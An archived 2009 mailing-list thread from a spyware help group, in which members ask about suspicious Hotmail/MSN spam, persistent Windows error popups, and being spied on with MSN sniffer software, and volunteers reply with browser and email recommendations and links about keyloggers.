with Hotmail for some time now, for various reasons.
 
Thank you so much,
 
Samantha



--- On Fri, 6/11/09, amy.licious <no_reply@yahoogroups.com> wrote:


From: amy.licious <no_reply@yahoogroups.com>
Subject: [spyware] Re: I have a problem.
To: spyware@yahoogroups.com
Received: Friday, 6 November, 2009, 6:12 PM


 





Hi Samantha, and Thanks for Joining Spyware!

Your problem is unclear, although we can take some guesses from your comments.

First, It sounds like you can rest easy that you have probably not contracted
Malware of any sort; it sounds more like a Spam issue ~~ or, and please do not
take offense ~~ an issue understanding Microsoft's ever~changing Hotmail
protocols regarding MSN Messenger and Hotmail Buddy Lists. Not to worry ~ no one
understands them, which is why so few people who have a choice use those two
programs anymore.

I'd make certain I'm not using Microsoft's web browser, Internet Explorer,
although it must be used for Windows Updates etc and certain, extremely few web
sites / pages around the internet. This Group does not approve of IE for a
number of reasons, but a single component of IE called ActiveX has created the
lion's share of Spyware, historically.

We formally support Mozilla's web browser, Firefox (www.firefox. com).
Informally, Opera (www.opera.com) and Google's Chrome (www.google. com/chrome)
are superb as well. Firefox is the most user~friendly, so I might recommend it
to start.

Second, with your Firefox browser, please go to mail.google. com and establish a
Google GMail account.

Third, copy from your Hotmail (and whatever other) account(s) a completely
up~to~date list of people with whom you'd like to correspond. From your new
GMail account, send a circular memo to all of those people that you've changed
your Hotmail email account over to Google's GMail and to please cancel your old
Hotmail address and replace it with your new GMail address.

Then, you'll discover the benefits of the Firefox browser and the GMail account.
One that I suspect you may like is that GMail's Spam catcher is ruthless,
compared to Hotmail or Yahoo Mail ~ but you must help GMail to help you by using
a more secure browser such as Firefox.

Happy Computing!
~Amy:)

Spyware@yahoogroups .com, Samantha MacDonald <samanthaaust@ ...> wrote:
>
> Hello there. I am new to the Group, my name is Samantha living northern
suburbs of Brisbane.�
> �
> Just a query if I may?� The past couple of weeks I have had my Hotmail
contact list compromised, I think the term is Phished, but Spammed could be the
term too, I am unsure. It happens this way.
> �
> An email comes in from an old�aquaintence of whom has deleted me from his
or her MSN Messenger or Hotmail account.��Then more�past
aquaintences who used to be in my contacts list, but I deleted over the years,
are in touch with me, people whom I have not had�anything to do with for
years. The email heading is "Hello D:" or MSN Blocker. It is all about who has
deleted me from their contact list. This programe has unearthed some old
contacts. Actually one point I will make is, one contact has passed away, and
yet his�email address has been pulled up.� I can copy and paste the
email if anyone would like to shed some light on this.�
> �
> I have run scans such as Malawarebytes, Windows Defender, AVG, all show I have
no virus. But does this mean I do not have a worm?�� I have been
in�touch with MSN and they in turn have referred me to a link to help me
with this, but the link does not open. Something about the web page cannot
display the page.� From what I am led to believe this problem started from
MSN Windows�Live.
> �
> I am not alone in this.� I have read complaints from all over the world
in MSN posts and groups. But no one has come up with an answer to to be rid of
this parasite.
> �
> Has anyone on here had the same trouble?
> �
> I will await your response,
> �
> Thanks,
> �
> Samantha
>
>
>
>
> ____________ _________ _________ _________ _________ _________ _
> Get more done like never before with Yahoo!7 Mail.
> Learn more: http://au.overview. mail.yahoo. com/
>
> [Non-text portions of this message have been removed]
>









      
________________________________________________________________________________\
__
Win 1 of 4 Sony home entertainment packs thanks to Yahoo!7.
Enter now: http://au.docs.yahoo.com/homepageset/

[Non-text portions of this message have been removed]

hi everybody
first, i'm french, so sory if i've got mistakes in my message....
i have a big problem with some "messages from microsoft window" and even if i
try to take it off, they come back right away.... exemple:
- COM surrogate don't work anymore-
- microsoft Sync center don't work anymore -
and everytime that i try to press on "x" to take it off...that comes back again,
and again...
it is a spyware?
i did scan my computer with malwarebytes, and it seem to good, no virus founded
in my computer
thanksssssssssssssssssssssss
maybe i will have to formate my computer ?

does anyone know about "the sniffer msn someting"
i don't know the exact word but this programm, spying you, everything that
you....they can go in your mail on msn and see all your messages.... i've got
problem all summer with someone who used this...and he still doing it...i need
help
and i receive e-mail from him to...he call him d.j. gang and i want to know if i
can retrace him...with is ip adress?
thankssssss

Apparently less than a handful of Google search results showing these
softwares...


MSN Sniffer 2
MSN Sniffer makes it easy to view captured messages of each conversation in real
... MSN Sniffer Lite shows conversation list only, and there is no auto-save
feature. ...
www.msnsniffer.com

MSN Sniffer | Capture MSN messenger chat on your network
Provides sniffer software, spy software, monitoring software. ... Just run the
MSN sniffer on any computer on your network, and start to capture. ...
www.msn-sniffer.com

In Spyware catagory threats you will want to research keyloggers and screen
captures. With survellience monitoring softwares one must check their State Laws
as to whether they are legally able to be used - when and where and by whom. In
your case of apparently being "spied upon" - it may very well have been a
violation of sorts.

THREAT INFO LINKS....

Keystroke logging
From Wikipedia, the free encyclopedia
http://en.wikipedia.org/wiki/Keylogger

Keyloggers defined
http://www.webopedia.com/TERM/K/keylogger.html

Screenshot
From Wikipedia, the free encyclopedia
http://en.wikipedia.org/wiki/Screenshot
(Various spywares are able to transmit all you see)

IP Address can be found in the message headers.


--- In spyware@yahoogroups.com, "Sophie" <sofievigneau@...> wrote:
>
> does anyone know about "the sniffer msn someting"
> i don't know the exact word but this programm, spying you, everything that
you....they can go in your mail on msn and see all your messages.... i've got
problem all summer with someone who used this...and he still doing it...i need
help
> and i receive e-mail from him to...he call him d.j. gang and i want to know if
i can retrace him...with is ip adress?
> thankssssss
>

THANKSSSSSSSSSSSSSSS A LOT FOR YOUR MESSAGE
XXX

 



________________________________
De : antibotnet <antibotnet@...>
À : spyware@yahoogroups.com
Envoyé le : Lun 16 Novembre 2009, 17 h 45 min 33 s
Objet : [spyware] Re: the sniffer msn program

 


Apparently less than a handful of Google search results showing these
softwares...

MSN Sniffer 2
MSN Sniffer makes it easy to view captured messages of each conversation in real
... MSN Sniffer Lite shows conversation list only, and there is no auto-save
feature. ...
www.msnsniffer. com

MSN Sniffer | Capture MSN messenger chat on your network
Provides sniffer software, spy software, monitoring software. ... Just run the
MSN sniffer on any computer on your network, and start to capture. ...
www.msn-sniffer. com

In Spyware catagory threats you will want to research keyloggers and screen
captures. With survellience monitoring softwares one must check their State Laws
as to whether they are legally able to be used - when and where and by whom. In
your case of apparently being "spied upon" - it may very well have been a
violation of sorts.

THREAT INFO LINKS....

Keystroke logging
From Wikipedia, the free encyclopedia
http://en.wikipedia .org/wiki/ Keylogger

Keyloggers defined
http://www.webopedi a.com/TERM/ K/keylogger. html

Screenshot
From Wikipedia, the free encyclopedia
http://en.wikipedia .org/wiki/ Screenshot
(Various spywares are able to transmit all you see)

IP Address can be found in the message headers.

--- In spyware@yahoogroups .com, "Sophie" <sofievigneau@ ...> wrote:
>
> does anyone know about "the sniffer msn someting"
> i don't know the exact word but this programm, spying you, everything that
you....they can go in your mail on msn and see all your messages.... i've got
problem all summer with someone who used this...and he still doing it...i need
help
> and i receive e-mail from him to...he call him d.j. gang and i want to know if
i can retrace him...with is ip adress?
> thankssssss
>







[Non-text portions of this message have been removed]